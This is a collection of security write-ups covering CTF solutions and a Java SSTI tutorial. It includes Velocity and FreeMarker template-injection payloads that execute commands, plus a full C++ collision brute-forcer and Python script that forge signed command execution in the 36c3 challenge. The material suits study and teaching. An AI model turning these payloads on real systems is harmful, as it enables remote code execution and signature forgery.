# Anonymous exchange (misc, 253p) > I've bought some bitcoins with my credit cards, and some of them attracted attention, but I don't know which ones. Could you find out? > Challenge running at anon.ctfcompetition.com:1337 Connecting to the challenge, we are presented the following menu: ``` Hey. Could you tell me if my cards ccard0x1 through ccard0x40 have attracted the wrong type of attention? Flagged cards are displayed in their dumps, and their encryption is deterministic. I seem to have the wrong encoding on my terminal, so I'll need help there. I'll patch you into a management interface in a few seconds. Welcome to our telnet dogecoin exchange !. We've currently frozen most of the operations pending an investigation into potential credit card fraud with law enforcement. - NEWACC to create an account. - NEWCARD to create a test credit card. - ASSOC <cardx> <accounty> to associate cardx to accounty. - BACKUP to generate a anonymized encrypted jsonified maybe-emojified backup. ``` Let's try typing some of the commands: ``` NEWACC OK: Account uaccount0x1 created. NEWCARD OK: Card ucard0x1 created. ASSOC ccard0x1 uaccount0x1 OK: Card ccard0x1 associated with account uaccount0x1. BACKUP [{"cards":[],"account":"d5d061c7916d633d"}, {"account":"2e110af22576601e","cards":[]}, {"account":"c514f2320ec707bf","cards":[{"card":"f3d94eb824490d44"}]}, {"account":"2dc5381fae066a60","cards":[{"card":"9573c3b0c238bf93"}]}, {"cards":[],"account":"746cb63871de2c89"}, [...] ] So, which cards are burnt? Answer with a string of zeroes and ones, no spaces. ``` The whole dump had a couple hundred of accounts and cards. Some of the cards had not only its ID in the dump, but also `"flagged" : "1"` pair, meaning the card is burnt. We need to know which of the cards with specific names are burnt, but we don't know which card IDs (such as "9573c3b0c238bf93"), correspond to which card name (such as "ccard0x40"). We can insert our own cards and accounts to the system though, so we can make some kind of special structure in the account-card graph. In fact, the graph is pretty sparse, as we are allowed only three cards per account and three accounts per card. That means, on average, the graph will have a lot of rather small components, and a long chain of accounts and cards will be very rare. If we insert such a chain ourselves, then we will know which card IDs correspond to which card names (for now, just our cards). Let's make such a graph: ``` ucard0xff | uaccount0x1 - ucard0x1 - uaccount0x2 - ucard0x2 - uaccount0x3 - ... - ucard0x41 - uaccount0x42 | ucard0xfe ``` Now, if we find a long chain in the received dump, it's very likely our structure. We can even know which end is which, because one of them ends with two cards, and the other with an account. So we're able to distinguish our cards and accounts from the whole mess. Let's connect the queried cards to our known accounts: `ccard0x1` to `uaccount0x2`, `ccard0x2` to `uaccount0x3` and so on. Then, we can easily find those cards in the dump too, and find which of them are flagged. After answering the query, we receive the flag. The solution implementation is in `doit.py` file.
sec-knowleage
# SSTI ## Velocity {% code title="SstiController.java" %} ``` package com.example.controller; import org.apache.velocity.VelocityContext; import org.apache.velocity.app.Velocity; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; import java.io.StringWriter; @RestController public class SstiController { @RequestMapping("/ssti/velocity") public String Velocity(@RequestParam(name = "content") String content) { Velocity.init(); VelocityContext velocityContext = new VelocityContext(); velocityContext.put("username", "test"); StringWriter stringWriter = new StringWriter(); Velocity.evaluate(velocityContext, stringWriter, "test", content); return stringWriter.toString(); } } ``` {% endcode %} 启动计算器 {% code title="payload" %} ```sh /ssti/velocity?content=%23%73%65%74%20%28%24%65%78%70%20%3d%20%22%65%78%70%22%29%3b%24%65%78%70%2e%67%65%74%43%6c%61%73%73%28%29%2e%66%6f%72%4e%61%6d%65%28%22%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%22%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%6d%64%2e%65%78%65%20%2f%63%20%63%61%6c%63%2e%65%78%65%22%29 =#set ($exp = "exp");$exp.getClass().forName("java.lang.Runtime").getRuntime().exec("cmd.exe /c calc.exe") ``` {% endcode %} **修复代码** 为了防止 SSTI 漏洞,我们应该对用户输入进行严格的输入验证和过滤,避免在模板引擎中直接使用用户输入。在使用 Velocity 模板引擎时,还可以配置 Velocity 引擎,禁止使用 Velocity 中危险的函数和类,从而增加应用程序的安全性。 ```java public String Velocity(@RequestParam(name = "content") String content) { VelocityEngine engine = new VelocityEngine(); engine.setProperty(RuntimeConstants.RESOURCE_LOADER, "class"); engine.setProperty("class.resource.loader.class", ClasspathResourceLoader.class.getName()); engine.setProperty(RuntimeConstants.VM_PERM_ALLOW_INLINE_REPLACE_GLOBAL, true); engine.setProperty(RuntimeConstants.VM_LIBRARY, ""); engine.init(); // 过滤用户输入,只允许输入字母、数字、下划线和空格 content = content.replaceAll("[^\\w\\s]", ""); VelocityContext context = new VelocityContext(); context.put("username", "test"); StringWriter stringWriter = new StringWriter(); engine.evaluate(context, stringWriter, "test", content); return stringWriter.toString(); } ``` ## FreeMarker FreeMarker的攻击方式主要是利用模板本身的语法和功能。攻击者可以在FreeMarker模板文件中使用内置函数或变量来执行恶意代码,或者使用一些特殊的语法结构来绕过过滤或转义机制。 因此,攻击者通常会利用FreeMarker模板注入漏洞来上传或修改模板文件,以在后续的渲染中执行恶意代码。例如,攻击者可以上传一个包含恶意代码的FreeMarker模板文件,然后通过Web应用程序中的漏洞或访问控制不当等方式来触发渲染操作,从而导致恶意代码的执行。 {% code title="SstiController.java" %} ``` package com.example.controller; import freemarker.template.Configuration; import freemarker.template.Template; import freemarker.template.TemplateException; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.io.IOException; import java.io.StringWriter; import java.util.HashMap; import java.util.Map; @RestController public class SstiController { @RequestMapping("/ssti/freemarker") public String freemarker() throws IOException, TemplateException { Configuration configuration = new Configuration(Configuration.VERSION_2_3_23); configuration.setClassForTemplateLoading(this.getClass(), "/templates"); Template template = configuration.getTemplate("test.ftl"); Map<String, Object> rootMap = new HashMap<String, Object>(); rootMap.put("username", "passwd"); StringWriter stringWriter = new StringWriter(); template.process(rootMap, stringWriter); return stringWriter.toString(); } } ``` {% endcode %} {% code title="test.ftl" %} ``` <!DOCTYPE html> <html> <head> <title>FreeMarker Injection Demo</title> </head> <body> <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd /c calc.exe") } </body> </html> ``` {% endcode %} > 这个示例中的FreeMarker模板文件存在注入漏洞。具体来说,它使用FreeMarker的内置方法`freemarker.template.utility.Execute`来执行系统命令,并将结果输出到页面中。攻击者可以利用这个漏洞,在`ex()`方法中注入恶意的命令来执行任意代码。 ![image-20230310161809365](../../.gitbook/assets/image-20230310161809365.png)
sec-knowleage
from library import * from collections import defaultdict if len(sys.argv) > 2: n = int(sys.argv[2]) else: n = None i, o, t = load_npz(sys.argv[1]) if 0: t = t[:, 100:1600] normalize(t) align_fft(t, 200) if 0: t = t[:, 4500:6500] normalize(t) align_fft(t, 100) d = defaultdict(list) for j, inp in enumerate(i): inp = "".join(chr(c) for c in inp) d[inp].append(j) tlist = [] for indices in d.values(): tlist.append(indices) t1 = t[tlist[0]] t2 = t[tlist[1]] show_red_green(t1, t2)
sec-knowleage
# 综合题目 ## 2017 34c3 Software_update 可以看出,程序的大概意思是上传一个 zip 压缩包,然后对 signed_data 目录下的文件进行签名验证。其中,最后验证的手法是大概是将每一个文件进行 sha256 哈希,然后**异或**起来作为输入传递给 rsa 进行签名。如果通过验证的话,就会执行对应的 pre-copy.py 和 post-copy.py 文件。 很自然的想法是我们修改 pre-copy.py 或者 post-copy.py 文件,使其可以读取 flag,然后再次绕过签名即可。主要有两种思路 1. 根据给定的公钥文件获取对应的私钥,进而再修改文件后伪造签名,然后大概看了看公钥文件几乎不可破,所以这一点,基本上可以放弃。 2. 修改对应文件后,利用**异或的特性使得其哈希值仍然与原来相同**,从而绕过签名检测。即使得 signed_data 目录下包含多个文件,使得这些文件的哈希值最后异或起来可以抵消修改 pre-copy.py 或者 post-copy.py文件所造成的哈希值的不同。 这里,我们选择第二种方法,这里我们选择修改 pre-copy.py 文件,具体思路如下 1. 计算 pre-copy.py 的原 hash 值。 2. 修改 pre-copy.py 文件,使其可以读取 flag。与此同时,计算新的 hash 值。将两者异或,求得异或差值 delta。 3. 寻找一系列的文件,使其 hash 值异或起来正好为 delta。 关键的步骤在于第三步,而其实这个文件可以看做是一个线性组合的问题,即寻找若干个 256 维01向量使其异或值为 delta。而 $$ (F=\{0,1\},F^{256},\oplus ,\cdot) $$ 是一个 256 维的向量空间。如果我们可以求得该向量空间的一个基,那么我们就可以求得该空间中任意指定值的所需要的向量。 我们可以使用 sage 来辅助我们求,如下 ```python # generage the base of <{0,1},F^256,xor,*> def gen_gf2_256_base(): v = VectorSpace(GF(2), 256) tmphash = compute_file_hash("0.py", "") tmphash_bin = hash2bin(tmphash) base = [tmphash_bin] filelist = ['0.py'] print base s = v.subspace(base) dim = s.dimension() cnt = 1 while dim != 256: tmpfile = str(cnt) + ".py" tmphash = compute_file_hash(tmpfile, "") tmphash_bin = hash2bin(tmphash) old_dim = dim s = v.subspace(base + [tmphash_bin]) dim = s.dimension() if dim > old_dim: base += [tmphash_bin] filelist.append(tmpfile) print("dimension " + str(s.dimension())) cnt += 1 print(cnt) m = matrix(GF(2), 256, 256, base) m = m.transpose() return m, filelist ``` 关于更加详细的解答,请参考 `exp.py`。 这里我修改 pre-copy 多输出 `!!!!come here!!!!` 字眼,如下 ```shell ➜ software_update git:(master) python3 installer.py now.zip Preparing to copy data... !!!!come here!!!! Software update installed successfully. ``` 参考文献 - https://sectt.github.io/writeups/34C3CTF/crypto_182_software_update/Readme - https://github.com/OOTS/34c3ctf/blob/master/software_update/solution/exploit.py ## 2019 36c3 SaV-ls-l-aaS 这个题的分类是 Crypto&Web,捋一下流程: 60601端口开着一个Web服务,题目描述给了连接方法: ```bash url='http://78.47.240.226:60601' && ip=$(curl -s "$url/ip") && sig=$(curl -s -d "cmd=ls -l&ip=$ip" "$url/sign") && curl --data-urlencode "signature=$sig" "$url/exec" ``` 可以看到,先是访问 `/ip` 得到 ip,再向 `/sign` post 过去 ip 和我们要执行的命令,得到签名,最后向 `/exec` post signature 来执行命令。我们执行这一行可以发现回显了`ls -l`执行的结果,发现有个 flag.txt。 看源码,Web 服务是由 go 起的: ```go package main import ( "bytes" "crypto/sha1" "encoding/json" "fmt" "io" "io/ioutil" "log" "net" "net/http" "strings" "time" ) func main() { m := http.NewServeMux() m.HandleFunc("/ip", func(w http.ResponseWriter, r *http.Request) { ip, _, err := net.SplitHostPort(r.RemoteAddr) if err != nil { return } fmt.Fprint(w, ip) }) m.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) { ip, _, err := net.SplitHostPort(r.RemoteAddr) if err != nil { return } remoteAddr := net.ParseIP(ip) if remoteAddr == nil { return } ip = r.PostFormValue("ip") signIP := net.ParseIP(ip) if signIP == nil || !signIP.Equal(remoteAddr) { fmt.Fprintln(w, "lol, not ip :>") return } cmd := r.PostFormValue("cmd") if cmd != "ls -l" { fmt.Fprintln(w, "lol, nope :>") return } msg := ip + "|" + cmd digest := sha1.Sum([]byte(msg)) b := new(bytes.Buffer) err = json.NewEncoder(b).Encode(string(digest[:])) if err != nil { return } resp, err := http.Post("http://127.0.0.1/index.php?action=sign", "application/json; charset=utf-8", b) if err != nil || resp.StatusCode != 200 { fmt.Fprintln(w, "oops, hsm is down") return } body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Fprintln(w, "oops, hsm is bodyless?") return } var signature string err = json.Unmarshal(body, &signature) if err != nil { fmt.Fprintln(w, "oops, hsm is jsonless?") return } fmt.Fprint(w, signature+msg) }) m.HandleFunc("/exec", func(w http.ResponseWriter, r *http.Request) { ip, _, err := net.SplitHostPort(r.RemoteAddr) if err != nil { return } remoteAddr := net.ParseIP(ip) if remoteAddr == nil { return } signature := r.PostFormValue("signature") digest := sha1.Sum([]byte(signature[172:])) b := new(bytes.Buffer) err = json.NewEncoder(b).Encode(signature[:172] + string(digest[:])) if err != nil { fmt.Fprintln(w, "oops, json encode") return } resp, err := http.Post("http://127.0.0.1/index.php?action=verify", "application/json; charset=utf-8", b) if err != nil || resp.StatusCode != 200 { fmt.Fprintln(w, "oops, hsm is down?") return } body, err := ioutil.ReadAll(resp.Body) if err != nil { fmt.Fprintln(w, "oops, hsm is bodyless?") return } var valid bool err = json.Unmarshal(body, &valid) if err != nil { fmt.Fprintln(w, "oops, json unmarshal") return } if valid { t := strings.Split(signature[172:], "|") if len(t) != 2 { fmt.Fprintln(w, "oops, split") } signIP := net.ParseIP(t[0]) if signIP == nil || !signIP.Equal(remoteAddr) { fmt.Fprintln(w, "lol, not ip :>") return } conn, err := net.DialTimeout("tcp", "127.0.0.1:1024", 1*time.Second) if err != nil { fmt.Fprintln(w, "oops, dial") return } fmt.Fprintf(conn, t[1]+"\n") conn.(*net.TCPConn).CloseWrite() io.Copy(w, conn) } }) s := &http.Server{ Addr: ":60601", Handler: m, ReadTimeout: 5 * time.Second, WriteTimeout: 5 * time.Second, MaxHeaderBytes: 1 << 20, } log.Fatal(s.ListenAndServe()) } ``` 代码很容易看,限制了 cmd 只能是`ls -l`,其余不给签名,看样子我们是要伪造其他命令的签名来读flag,这里注意到签名和验签的过程是传给本地起的一个 php 来完成的,看一下这部分源码: ```php <?php define('ALGO', 'md5WithRSAEncryption'); $d = json_decode(file_get_contents('php://input'), JSON_THROW_ON_ERROR); if ($_GET['action'] === 'sign'){ $pkeyid = openssl_pkey_get_private("file:///var/www/private_key.pem"); openssl_sign($d, $signature, $pkeyid, ALGO); echo json_encode(base64_encode($signature)); openssl_free_key($pkeyid); } elseif ($_GET['action'] === 'verify') { $pkeyid = openssl_pkey_get_public("file:///var/www/public_key.pem"); echo json_encode(openssl_verify(substr($d, 172), base64_decode(substr($d,0, 172)), $pkeyid, ALGO) === 1); openssl_free_key($pkeyid); } ``` 采用的是`md5WithRSAEncryption`的方式签名,本地试了一下,是把我们传入的 `$d` md5 后转为hex,填充到`0x1ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff003020300c06082a864886f70d020505000410`后面,组成数字然后用RSA签名。 看样子整个逻辑找不到一点问题,用的都是标准库,基本无法攻击。有个思路是通过代理更换 ip,可以拿到两个 ip|ls -l 的签名,这样我们就拥有了两组 RSA 的 m 和 c,因为题目给了 dockerfile 给了生成公私钥的方法,使用 openssl 默认生成,e为65537,那么我们可以通过求公因数的方式来求出 n。 在得到两组签名后,我们要得到 RSA 的m,就是填充后的数,所以按照代码逻辑,在 go 里面先是 sha1: ```go msg := ip + "|" + cmd digest := sha1.Sum([]byte(msg)) b := new(bytes.Buffer) err = json.NewEncoder(b).Encode(string(digest[:])) ``` 再 php 里的 md5,得到两组 m 和 c,但是总是求不出公因数 n,怀疑求的 m 不对。看代码发现 go 里把 sha1的结果用 json 编码,然后传到 php里 json 解码。这部分非常可疑,为何要用 json 编码(用 hex 传过去它不香么),本地搭一下环境跟一下。(题目给了dockerfile) 起个docker,改一下 index.php,加一个`var_dump($d);`,再改一下 go,返回一下 php 的结果: ```go fmt.Fprintln(w,string(body)) ``` 现在让程序签名,返回结果: ``` string(38) " ��.���?-�KC��@�" "K4FEmxz4yuTsjDAbRZQmHJ+MBiCSGaOnpZTLbThXpCkDYe3siAIPfihX6ppjN2Tz6XqOr4tF\/u1\/+ccfhj8NNLIL+2hknyDXbosmMBV8mEGYsMqQHAE0f+3OhDWlzN5RnteSMYNZbTipFErB8ZOWCiXmynWxsqJhyaN9J6\/\/h6I=" oops, hsm is jsonless? ``` $d 竟然是长度为 38 的字符串,看来果然是这里编码有问题,我们需要看一下每个步骤的结果,先看一下 go 里 json编码后的 sha1 结果是什么: ```go package main import ( "bytes" "crypto/sha1" "encoding/json" "fmt" ) func main() { msg := "172.17.0.1|ls -l" digest := sha1.Sum([]byte(msg)) b := new(bytes.Buffer) json.NewEncoder(b).Encode(string(digest[:])) fmt.Print(string(b.Bytes())); } ``` 运行一下: ``` "\u000e\t\u001d\ufffd\u0012\ufffd.\ufffd\ufffd\ufffd?-\ufffdKC\ufffd\u0005\ufffd@\ufffd" ``` 和正常的sha1的结果来比较一下: ```bash Python 2.7.16 (default, Sep 2 2019, 11:59:44) [GCC 4.2.1 Compatible Apple LLVM 10.0.1 (clang-1001.0.46.4)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> "\u000e\t\u001d\ufffd\u0012\ufffd.\ufffd\ufffd\ufffd?-\ufffdKC\ufffd\u0005\ufffd@\ufffd" '\\u000e\t\\u001d\\ufffd\\u0012\\ufffd.\\ufffd\\ufffd\\ufffd?-\\ufffdKC\\ufffd\\u0005\\ufffd@\\ufffd' >>> from hashlib import * >>> sha1('172.17.0.1|ls -l').digest() '\x0e\t\x1d\xbd\x12\x90.\xca\xf0\xd9?-\x98KC\xeb\x05\xa1@\xd1' ``` 由于 go 的 json 编码,很多不可见字符都被转为了 `U+fffd`,丢失了很多信息。 再经过 php 接口的接收,我们来看一下结果: ```php $d = json_decode(file_get_contents('php://input'), JSON_THROW_ON_ERROR); var_dump(file_get_contents('php://input')); var_dump($d); var_dump(bin2hex($d)); ``` 结果: ``` string(89) ""\u000e\t\u001d\ufffd\u0012\ufffd.\ufffd\ufffd\ufffd?-\ufffdKC\ufffd\u0005\ufffd@\ufffd" " string(38) " ��.���?-�KC��@�" string(76) "0e091defbfbd12efbfbd2eefbfbdefbfbdefbfbd3f2defbfbd4b43efbfbd05efbfbd40efbfbd" "K4FEmxz4yuTsjDAbRZQmHJ+MBiCSGaOnpZTLbThXpCkDYe3siAIPfihX6ppjN2Tz6XqOr4tF\/u1\/+ccfhj8NNLIL+2hknyDXbosmMBV8mEGYsMqQHAE0f+3OhDWlzN5RnteSMYNZbTipFErB8ZOWCiXmynWxsqJhyaN9J6\/\/h6I=" oops, hsm is jsonless? ``` `U+fffd`变成了`\xef\xbf\xbd`。所以由于 go 的 json 编码问题,丢失了很多信息,造成了 md5 前的数据有很多相同字符。当时做题时往下并没有细想,得到 n 后总是想构造出任意命令的签名,也很疑惑如果构造出岂不是这种签名就不安全了?其实是无法得到的。 正解是 go 的这种问题 ,为碰撞创造了条件。我们可以碰撞出在这种编码情况下与 `ls -l `有相同结果的`cat *` 此类命令。但是问题是我们需要非常大量 ip 来提供碰撞的数据。 可以发现,go 取 ip 的时候,是先用`net.ParseIP`解析了 ip,我们在 ip 每个数字前面加 0 ,解析后还是原来的 ip 结果,每个数字最多添加 256 个 0,四个数字就已经产生了 `2^32`种不同的组合,足以碰撞出 `ls -l `与 `cat *`之间的冲突。 官方题解的 c++ 碰撞脚本我本地编译的有点问题,加了一些引入的头文件: ```c++ // g++ -std=c++17 -march=native -O3 -lcrypto -lpthread gewalt.cpp -o gewalt #include <cassert> #include <iomanip> #include <string> #include <sstream> #include <iostream> #include <functional> #include <random> #include <unordered_map> #include <algorithm> #include <thread> #include <atomic> #include <mutex> #include <array> #include <openssl/sha.h> const unsigned num_threads = std::thread::hardware_concurrency(); static std::string hash(std::string const& s) { SHA_CTX ctx; if (!SHA1_Init(&ctx)) throw; if (!SHA1_Update(&ctx, s.data(), s.length())) throw; std::string d(SHA_DIGEST_LENGTH, 0); if (!SHA1_Final((uint8_t *) &d[0], &ctx)) throw; return d; } static std::u32string kapot(std::string const& s) { std::u32string r(s.size(), 0); size_t o = 0; for (size_t i = 0; i < s.length(); ) { auto T = [](uint8_t c) { return (c < 0x80) ? 1 /* ASCII */ : (c & 0xc0) == 0x80 ? 0 /* continuation */ : (c & 0xe0) == 0xc0 ? 2 /* 2-byte chunk */ : (c & 0xf0) == 0xe0 ? 3 /* 3-byte chunk */ : (c & 0xf8) == 0xf0 ? 4 /* 4-byte chunk */ : -1; }; uint32_t c = s[i++]; auto cont = [&]() { c = (c << 6) | (s[i++] & 0x3f); }; switch (T(c)) { case -1: case 0: invalid: c = 0xfffd; /* fall through */ case 1: valid: r[o++] = c; break; case 2: if (c &= 0x1f, i+0 >= s.size() || T(s[i+0])) goto invalid; goto one; case 3: if (c &= 0x1f, i+1 >= s.size() || T(s[i+0]) || T(s[i+1])) goto invalid; goto two; case 4: if (c &= 0x1f, i+2 >= s.size() || T(s[i+0]) || T(s[i+1]) || T(s[i+2])) goto invalid; cont(); two: cont(); one: cont(); goto valid; } } r.resize(o); return r; } std::atomic<uint64_t> hcount = 0, kcount = 0; typedef std::unordered_map<std::u32string, std::string> tab_t; tab_t tab0, tab1; std::mutex mtx; std::array<uint8_t,4> ip; std::string cmd0, cmd1; class stuffer_t { private: std::array<size_t,4> cnts; size_t step; std::string cmd; public: stuffer_t(size_t t, size_t s, std::string c) : cnts{t}, step(s), cmd(c) {} std::string operator()() { //XXX this is by far not the most efficient way of doing this, but yeah if (++cnts[3] >= cnts[0]) { cnts[3] = 0; if (++cnts[2] >= cnts[0]) { cnts[2] = 0; if (++cnts[1] >= cnts[0]) { cnts[1] = 0; cnts[0] += step; } } } std::stringstream o; for (size_t i = 0; i < 4; ++i) o << (i ? "." : "") << std::string(cnts[i], '0') << (unsigned) ip[i]; o << "|" << cmd; return o.str(); } }; void go(size_t tid) { //XXX tid stuff is a hack, but YOLO bool one = tid & 1; stuffer_t next(tid >> 1, (num_threads + 1) >> 1, one ? cmd1 : cmd0); tab_t& mytab = one ? tab1 : tab0; tab_t& thtab = one ? tab0 : tab1; uint64_t myhcount = 0, mykcount = 0; while (1) { std::string r = next(); { ++myhcount; auto h = hash(r); if ((h.size()+3)/4 < (size_t) std::count_if(h.begin(), h.end(), [](unsigned char c) { return c < 0x80; })) continue; ++mykcount; auto k = kapot(h); if (k.size() > 3 + (size_t) std::count(k.begin(), k.end(), 0xfffd)) continue; std::lock_guard<std::mutex> lck(mtx); hcount += myhcount, myhcount = 0; kcount += mykcount, mykcount = 0; if (thtab.find(k) != thtab.end()) { mytab[k] = r; std::cerr << "\r\x1b[K" << "\x1b[32m"; std::cout << tab0[k] << std::endl << tab1[k] << std::endl; std::cerr << "\x1b[0m"; std::cerr << std::hex; bool first = true; for (uint32_t c: k) std::cerr << (first ? first = false, "" : " ") << c; std::cerr << std::endl; std::cerr << std::dec << "hash count: \x1b[35m" << hcount << "\x1b[0m"; { std::stringstream s; s << std::fixed << std::setprecision(2) << log(hcount|1)/log(2); std::cerr << " (2^\x1b[35m" << std::setw(5) << s.str() << "\x1b[0m" << ")" << std::endl; } std::cerr << "kapot count: " << "\x1b[35m" << kcount << "\x1b[0m"; { std::stringstream s; s << std::fixed << std::setprecision(2) << log(kcount|1)/log(2); std::cerr << " (2^\x1b[35m" << std::setw(5) << s.str() << "\x1b[0m)" << std::endl; } std::cerr << "table sizes: \x1b[35m" << tab0.size() << "\x1b[0m \x1b[35m" << tab1.size() << "\x1b[0m" << std::endl; exit(0); } if (mytab.size() < (1 << 20)) mytab[k] = r; } hcount += myhcount; kcount += mykcount; } } void status() { while (1) { { std::lock_guard<std::mutex> lck(mtx); std::cerr << "\r\x1b[K"; std::cerr << "hash count: \x1b[35m" << std::setw(12) << hcount << "\x1b[0m "; { std::stringstream s; s << std::fixed << std::setprecision(2) << log(hcount|1)/log(2); std::cerr << "(2^\x1b[35m" << std::setw(5) << s.str() << "\x1b[0m) | "; } std::cerr << "kapot count: \x1b[35m" << std::setw(12) << kcount << "\x1b[0m "; { std::stringstream s; s << std::fixed << std::setprecision(2) << log(kcount|1)/log(2); std::cerr << "(2^\x1b[35m" << std::setw(5) << s.str() << "\x1b[0m) | "; } std::cerr << "tables: \x1b[35m" << std::setw(9) << tab0.size() << " " << std::setw(9) << tab1.size() << "\x1b[0m " << std::flush; } std::this_thread::sleep_for(std::chrono::milliseconds(100)); } } int main(int argc, char **argv) { if (argc < 2) { std::cerr << "\x1b[31mneed IPv4 in argv[1]\x1b[0m" << std::endl; exit(1); } { std::stringstream ss(argv[1]); for (auto& v: ip) { std::string s; std::getline(ss, s, '.'); int n = std::atoi(s.c_str()); if (n < std::numeric_limits<uint8_t>::min() || n > std::numeric_limits<uint8_t>::max()) goto bad_ip; v = n; } if (!ss) { bad_ip: std::cerr << "\x1b[31mbad IPv4 given?\x1b[0m" << std::endl; exit(2); } } if (argc < 4) { std::cerr << "\x1b[31mneed commands in argv[2] and argv[3]\x1b[0m" << std::endl; exit(2); } cmd0 = argv[2]; cmd1 = argv[3]; std::thread status_thread(status); std::vector<std::thread> ts; for (unsigned i = 0; i < num_threads; ++i) ts.push_back(std::thread(go, i)); for (auto& t: ts) t.join(); } ``` 编译可能会找不到 `lcrypto`,编译命令加上 lcrypto 路径(我本地是 /usr/local/opt/openssl/lib) ```bash g++ -std=c++17 -march=native -O3 -lcrypto -lpthread gewalt.cpp -o gewalt -L/usr/local/opt/openssl/lib ``` 与 go 交互的脚本: ```python #!/usr/bin/env python3 import sys, requests, subprocess benign_cmd = 'ls -l' exploit_cmd = 'cat *' ip, port = sys.argv[1], sys.argv[2] url = 'http://{}:{}'.format(ip, port) my_ip = requests.get(url + '/ip').text print('[+] IP: ' + my_ip) o = subprocess.check_output(['./gewalt', my_ip, benign_cmd, exploit_cmd]) print('[+] gewalt:' + o.decode()) payload = {} for l in o.decode().splitlines(): ip, cmd = l.split('|') payload['benign' if cmd == benign_cmd else 'pwn'] = ip, cmd print(payload) sig = requests.post(url + '/sign', data={'ip': payload['benign'][0], 'cmd': payload['benign'][1]}).text print('[+] sig: ' + sig) r = requests.post(url + '/exec', data={'signature': sig[:172] + payload['pwn'][0] + '|' + payload['pwn'][1]}) print(r.text) ``` ```bash ⚙  SaV-ls-l-aaS  python solve.py 127.0.0.1 60601 [+] IP: 172.17.0.1 fffd fffd fffd fffd fffd fffd 55 fffd fffd fffd fffd c fffd fffd fffd fffd fffd fffd fffd fffd hash count: 168104875 (2^27.32) kapot count: 3477222 (2^21.73) table sizes: 8745 8856 [+] gewalt:00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000172.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017.000000000000000000000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001|ls -l 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000172.17.000000000000000000000000.0000000000000000000000000000000000000001|cat * {'pwn': (u'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000172.17.000000000000000000000000.0000000000000000000000000000000000000001', u'cat *'), 'benign': (u'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000172.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017.000000000000000000000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001', u'ls -l')} [+] sig: ODxSukwtu4rHICBpzT23WGD7DCJNawhA0DUN/tcyv1AgwNmS8OPUnO5FnBBDgiaVx5OTYd4OjH8LVbKiXUBUBuFx1OHDgKBKG5umkKMLt+350SlgMWY5qWny9tPIU3I+X0A9FcADCBCi6f0PkXfc0CSCZXuFu9rAKnVGsbmaUwY=00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000172.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017.000000000000000000000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001|ls -l hxp{FLAG} ``` 参考: - https://ctftime.org/writeup/17966
sec-knowleage
# Fly Me To The Moon Category: Forensics, 85 Points ## Description > Our Satellite managed to pick up some data from outer space (Aliens? wink wink). > > We have tried to make some sense of it for a long time, Maybe you can? > > It`s a new year after all... ## Solution Let's check the file that was attached: ```console root@kali:/media/sf_CTFs/matrix/Fly_Me_To_The_Moon# file message.gz message.gz: data ``` It has a `.gz` extension, but isn't a GZip file. ```console root@kali:/media/sf_CTFs/matrix/Fly_Me_To_The_Moon# cat message.gz | xxd -g 1 | head 00000000: 15 14 13 12 00 00 00 00 2b c8 e7 17 00 6e 79 6b ........+....nyk 00000010: 72 71 45 4d 4b 77 2b 65 57 67 6b 42 45 54 71 67 rqEMKw+eWgkBETqg 00000020: 7a 42 46 30 58 75 49 68 74 53 4b 56 46 53 6d 73 zBF0XuIhtSKVFSms 00000030: 41 54 73 55 6f 51 6c 4a 38 37 49 59 6e 5a 53 39 ATsUoQlJ87IYnZS9 00000040: 6a 4a 64 31 15 14 13 12 01 00 00 00 22 50 e4 4c jJd1........"P.L 00000050: 00 47 46 5a 79 64 39 68 62 35 5a 57 79 72 6d 48 .GFZyd9hb5ZWyrmH 00000060: 65 69 2f 6d 4c 53 47 74 56 34 62 76 6c 5a 6d 73 ei/mLSGtV4bvlZms 00000070: 54 57 6b 6f 61 49 69 39 7a 34 68 74 4a 58 63 4c TWkoaIi9z4htJXcL 00000080: 79 42 43 78 6f 66 73 2b 15 14 13 12 02 00 00 00 yBCxofs+........ 00000090: 44 be 79 53 00 2f 71 56 31 7a 6f 7a 52 4c 70 6b D.yS./qV1zozRLpk ``` It looks like part binary, part base64. However the base64 doesn't mean anything. We can see sort of a pattern, let's try to align the hex dump to make it clearer: ```console root@kali:/media/sf_CTFs/matrix/Fly_Me_To_The_Moon# cat message.gz | xxd -g 1 -c 68 00000000: 15 14 13 12 00 00 00 00 2b c8 e7 17 00 6e 79 6b 72 71 45 4d 4b 77 2b 65 57 67 6b 42 45 54 71 67 7a 42 46 30 58 75 49 68 74 53 4b 56 46 53 6d 73 41 54 73 55 6f 51 6c 4a 38 37 49 59 6e 5a 53 39 6a 4a 64 31 ........+....nykrqEMKw+eWgkBETqgzBF0XuIhtSKVFSmsATsUoQlJ87IYnZS9jJd1 00000044: 15 14 13 12 01 00 00 00 22 50 e4 4c 00 47 46 5a 79 64 39 68 62 35 5a 57 79 72 6d 48 65 69 2f 6d 4c 53 47 74 56 34 62 76 6c 5a 6d 73 54 57 6b 6f 61 49 69 39 7a 